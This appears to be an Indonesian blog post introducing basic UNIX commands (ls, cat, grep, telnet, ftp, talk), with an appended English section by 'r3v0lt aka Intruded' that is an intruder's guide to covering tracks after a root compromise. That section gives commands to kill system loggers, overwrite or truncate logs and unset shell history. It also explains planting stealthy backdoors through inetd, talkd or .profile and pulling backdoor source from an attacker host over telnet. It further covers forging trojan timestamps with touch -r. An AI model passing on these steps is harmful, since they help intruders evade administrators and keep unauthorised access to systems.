By : Yudi Bascoro
PERINTAH-PERINTAH UNIX Sebelum lanjut perlu diingat bahwa di Linux/UNIX semua perintah ditulis dalam huruf kecil,dan Linux/UNIX membedakan huruf besar dan kecil.
——> ls
Ingat perintah DIR di DOS? … nah perintah ini sama dgn DIR, gunanya untuk menampilkan ‘list’ file di dalam directory. Perintah ls juga dilengkapi dengan flag tambahan yang bisa di lihat dengan mengetik : ls –help ; menampilkan bantuan man ls ; man bisa juga diartikan manual, jadi manual ls
Beberapa perintah ls yang umum adalah :
ls -l ; menampilkan informasi tambahan (l = long)
ls -a ; menampilkan hidden file (a = attribute)
ls -la Informasi tambahan yang ditampilkan oleh flag -l menyangkut user yang memiliki ‘owns’, file tanggal dan jam file itu dibuat, hak/permissions file, dan informasi lain, contoh :
rwxr-x–x
Catatan :
karakter 1-3: user/owner permissions
karakter 4-6: group permissions
karakter 7-8: other permissions
Arti Hurufnya itu ini lo:
r - read, permissions utk ‘baca’
w - write, permission utk ‘tulis’
x - (e)xecute, permission utk ‘menjalankan’
Jadi pada contoh diatas : user/owner dapat read/baca, write/tulis dan execute/jalankan file yg satu group dgn user/owner dpt read/baca, execute/jalankan file user lain dapat execute/menjalankan file tsb - berarti permission tidak ada, jika ada d sebelum permission berarti itu adalah directory
——> cat
Cat atau concatenate dipakai untuk menampilkan dan menulis/membuat file, kira-kira sama dengan perintah TYPE di DOS. Untuk menampilkan isi file ketik : “cat ” Untuk membuat file ketik : “cat > ” ketik isi file dan utk menyimpan tekan CTRL + C atau CTRL + D kalau namafile sudah ada file tersebut akan ditimpa, jika kita ingin data ditambahkan kefile yang sudah ada ganti > dengan >>
——> more
Menampilkan isi dari file, perlayar, tekan q untuk quit more jilid1.txt
——> grep
Menampilkan semua baris yang mengandung pola yang diinginkan grep kecoak jilid1.txt akan menampilkan semua baris teks yang mengandung kecoak di file jilid1.txt
——> man
UNIX help/manual, ketik : man untuk eksekusi. man pwd
——> echo
echo dipakai utk menampilkan apa yang kita ketik di layar, seperti :
echo “saya belajar linux”
saya belajar linux
atau untuk membuat file, seperti :
echo “biff n” > .profile
yang akan membuat file .profile di directory aktif yg berisi teks “biff n” atau menambah file isi file dgn mengganti > dengan >>
——> cp
copy, dipakai untuk mengcopy file.
cp jilid1.txt jilid1.txt.backup
cp jilid1.txt ~cyberbug/backup/jilid1.txt.backup
——> mv
move, mengganti nama file atau directory
mv jilid1.txt jilid1a.txt
mv backup bak
——> rm
remove, hapus file
rm jilid1.txt ; hapus file jilid1.txt
rm * ; hapus semua file di directory aktif (hati-hati!)
——> cd
change directory, dipakai untuk pindah directory, sama dengan perintah CD di DOS
cd /root
perhatikan bahwa di Linux yang digunakan adalah / (slash) bukan \ (backslash)
——> mkdir
make directory, membuat directory
mkdir backup
——> rmdir
remove directory, hapus directory, file-file dalam directory harus dihapus dulu sebelum menghapus directory.
rmdir backup
——> who
who digunakan untuk menampilkan user yang login ke system, hasilnya kira-kira sebagai berikut :
cyberservices:~$ who
root tty1 Dec 20 17:47
cyberbug tty2 Dec 20 17:48
cyberbug tty3 Dec 20 17:48
cyberbug ttyp0 Dec 20 18:43 (localhost)
Kolom pertama menunjukkan nama user yang login, kolom kedua menunjukkan terminal line yang digunakan, kolom ketiga menunjukkan waktu login dan kolom keempat menunjukkan domain atau IP asal mereka koneksi, jika kosong berarti mereka main langsung dari console.
——> whoami
Kalo lupa diri ini perintahnya : Siapakah Aku?
cyberservices:~$ whoami
cyberbug
——> who am i
Ini juga kalo sudah lupa daratan )
cyberservices:~$ who am i
cyberservices!cyberbug tty3 Dec 20 17:48
——> pwd
Tampilkan directory aktif, pwd = print working directory, perintah yang dipakai kalo saat jalan2, sudah gak tau mo pulang lewat mana
cyberservices:~$ pwd
/home/cyberbug
——> ps
Menampilkan proses yang aktif
cyberservices:~$ ps
PID TTY STAT TIME COMMAND
87 2 S 0:00 -bash
88 3 S 0:00 -bash
1440 2 S 0:00 pico jilid2.txt
1443 3 R 0:00 ps
——> ping
Mengecek host apakah ‘up’ utk istilah teknisnya silakan ‘man ping’
cyberservices:~$ ping localhost
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms
— localhost ping statistics —
5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$ ping 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms
— 127.0.0.1 ping statistics —
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$
Perhatikan bahwa localhost dan 127.0.0.1 adalah sama
127.0.0.1 adalah local loopback yang disediakan untuk testing.
——> finger
Mencari informasi user
cyberservices:~$ finger
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:37 Dec 22 01:10
cyberservices:~$ finger @cyberservices.com
[cyberservices.com]
Welcome to Linux version 2.0.34 at cyberservices.com !
3:46am up 2:37, 3 users, load average: 0.00, 0.00, 0.00
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:39 Dec 22 01:10
cyberservices:~$ finger @localhost
[localhost]
Welcome to Linux version 2.0.34 at cyberservices.com !
3:47am up 2:38, 3 users, load average: 0.00, 0.00, 0.00
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:40 Dec 22 01:10
cyberservices:~$ finger cyberbug
Login: cyberbug Name: CyberBug
Directory: /home/cyberbug Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty2 8 seconds idle
On since Tue Dec 22 01:10 (PHT) on tty3
Last login Tue Dec 22 01:13 (PHT) on tty4
Mail forwarded to “|IFS=’ ‘&&exec /usr/bin/procmail -f-||exit 75
#cyberbug”
No mail.
No Plan.
cyberservices:~$ finger root
Login: root Name:
Directory: /root Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty1 1 hour 42 minutes idle
Mail last read Tue Dec 15 09:19 1998 (PHT)
No Plan.
——> telnet
Melakukan komunikasi dengan host lain melalui telnet protocol
cyberservices:~$ telnet localhost
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
Welcome to Linux 2.0.34.
cyberservices login: cyberbug
Password: 3m4nggu3p1k1r1n
Linux 2.0.34.
Last login: Tue Dec 22 01:13:52 on tty4.
No mail.
cyberservices:~$ telnet localhost 25
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
220 cyberservices.com ESMTP Sendmail 8.9.0/8.9.0; Tue, 22 Dec 1998
03:52:51 +0800
helo darling
250 cyberservices.com Hello cyberbug@localhost [127.0.0.1], pleased to
meet you
mail from: guest@cyberservices.com
250 guest@cyberservices.com… Sender ok
rcpt to: untukmu@seorang.jauh.disana
250 untukmu@seorang.jauh.disana… Recipient ok (will queue)
data
354 Enter mail, end with “.” on a line by itself
Kukirim lagu dan salam rinduku .
250 EAA01615 Message accepted for delivery quit
cyberservices:~$ telnet localhost 110
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’. +OK cyberservices POP3 Server (Version 1.005l) ready at
user root
+OK please send PASS command pass 3m4nggu3p1k1r1n
+OK 2 messages ready for root in /usr/spool/mail/root stat
+OK 2 7227
retr 1
quit
——> ftp
Menggunakan file tranfer program
cyberservices:~$ ftp localhost
Connected to localhost.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May 20 13:45:04 CDT 1998) ready.
Name (localhost:cyberbug): ftp
331 Guest login ok, send your complete e-mail address as password.
Password: cyberbug@k-elektronik.org
230-Welcome, archive user! … blah blah … blah
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp juga bisa dilakukan dengan melakukan telnet ke port 21
cyberservices:~$ telnet localhost 21
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May 20 13:45:04 CDT 1998) ready.
——> talk
Berbicara dengan user lain, misalnya cyberbug request talk ke root sbb:
talk root
atau
talk root@cyberservices.com
[Waiting for your party to respond]
[Ringing your party again]
Di terminal root akan muncul pesan :
Message from Talk_Daemon@cyberservices at 4:00 …
talk: connection requested by cyberbug@localhost.
talk: respond with: talk cyberbug@localhost
root harus mengetik talk cyberbug@localhost jika ingin menjawab request
talk cyberbug@localhost
[Connection established]
:: Perintah Tambahan dari Saya ( r3v0lt aka Intruded)
1. Perintah Untuk Kompilasi File
ex. #gcc -o namafile filekompilasi
#gcc -o pscan pscan.c
2. Perintah Running file eksekusi
ex. #./file
#./pscan
#./scaner.pl
#./scanner.sh
3. Perintah Hentikan proses
ex.# Ctrl+c
4. Perintah Proses sementara
ex.#ctrl+z ,balik ke shell ketik fg (pada FreeBSD)
5. Perintah ganti Shell (pada FreeBSD)
ex.#chsh —> ksh,bash,tcsh
6. Perintah Ganti Passwd
ex.#passwd
7. Perintah melihat ip suatu host
ex.#dig ip
ex.#nslookup ip
8. Perintah editor
ex.#pico wepedodol.c
9. perintah pipa, dua proses sekaligus
ex.# ls -al |head file
akan menanmpilakn direktori bagian atas nya saja
10.perintah ganti mode
ex.#chmod +x file
r - read, permissions utk ‘baca’
w - write, permission utk ‘tulis’
x - (e)xecute, permission utk ‘menjalankan’
1. killall -9 syslogd klogd - pesky loggers! only few admins will notice if they get turned off. Now you can act freely. copy secure.1 and messages.1 from /var/log over secure and messages Normally, these logs are the only ones with the intruders IP and traces of a root compromise in them. If *.1 doesn’t exist, truncate the files. Also, unset HISTFILE is important. Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named or even /. Very unprofessional .
2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf… Inform yourself about the frequency the system is being maintained, administrated, if the logfiles are being analyzed.
* Look how many people have access to it (/etc/passwd) - the more the better for you (keeps attention away from you).
* Look if the system is already backdoored!! you might want to remove other backdoors.
* Look for a loghost or snmp (dangerous because you cant manipulate the logs on a far-away loghost). Watch out for *logd, sniffers, netmon’s etc before you do anything great on the host. If you are paranoid, traceroute the host, and see if non-routers are before that host (probably IDS, loghost, sniffer, etc).
3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH! It is too easy to detect you if you add yourself to /etc/passwd, or open a port by manipulating inetd.conf. Let me tell you that root kits and /bin/login trojans are the first things any sane admin will watch for. Install a nice stealthy port backdoor. My approach to uploading files is doing:
(on your box)
$ uuencode -m backdoor.c backdoor.c | less
(on the target box)
uudecode
# cc -o backdoor backdoor.c
A nice different method is putting a daemon on your own box, on port 666, that spits out the source code when someone telnets to it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c As I said, make sure you can get back in. If the box you rooted has an uptime of more than 300 days or so, you might consider not installing the backdoor for startup. Instead, kill the vulnerable daemon, and when the host restarts, come back using an exploit. Normally, you can replace a lame daemon that nobody uses with your backdoor. Look at inetd.conf to see what daemons are active. A safe bet is in.talkd which often is activated but seldom ever used. So, when you want to re-activate your backdoor, talk root@0wned.host.com for a second, and your backdoor is running. You can also add /path/to/backdoor to /root/.profile.. but it is a bit riskier than the inetd backdoor method.
4. Subscribe to bugtraq, CIAC security list, or look at rootshell, to see what you need to do to patch your buggy stuff. If RPM is installed you can try a rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm If not, use ncftp to fetch the file anonymously, because it doesn’t need user interaction. If you want, add an additional backdoor in your “patched” server. QPOP 2.53 even supports this itself. For all files you replace, you should modify the time stamps, which wont help, if the admin uses tripwire or cksum, but if the admin is, like most admins, a complete lamer that does find / -ctime to scan for trojans and thinks he knows his job. To modify timestamps, you do a simple:
touch -r /bin/bash /path/to/your/trojan
this will copy the exact date/time info from /bin/bash over your freshly added trojan. Voila! The alternative to all this for lazy people is, to add a ipfwadm rule that prevents traffic from the outside (-W eth0) to the ports with the buggy daemons, and adding that command to a rc.d script as well. Bind doesn’t need tcp port 53 for anything except zone transfers and the RoTShB/ADM bind exploits. It works fine with 53/tcp firewalled. But be aware that this might get you detected, lets say if you disable port 110 or 143 on an ISP’s central mail exchange server…
About your backdoor:
Port > 10000 is strongly recommended, also a backdoor using UDP, ICMP, or even something as unusual as raw IP is very useful. People that bind /bin/sh to a port are idiots, because they open that host to everyone, letting in sniffers, and probably other people who may damage the host seriously. Make sure to password protect everything that runs as root. A password of a minimum length of 8 characters, because you have no way of detecting a brute force attack. For the C programmers, let me say, listen(sockfd,1). Maybe 2 connections, but not more.
For comfortability, you can add some stuff you want to occur on each successful backdoor login, like system(”w”), system(”killall -9 syslogd klogd”), or whatever. If you want a front-end backdoor with some integrated functions, try gateway[5]
Sumber : Dasar-dasar perintah UNIX/LINUX ( Yudi Bascoro)
No comments:
Post a Comment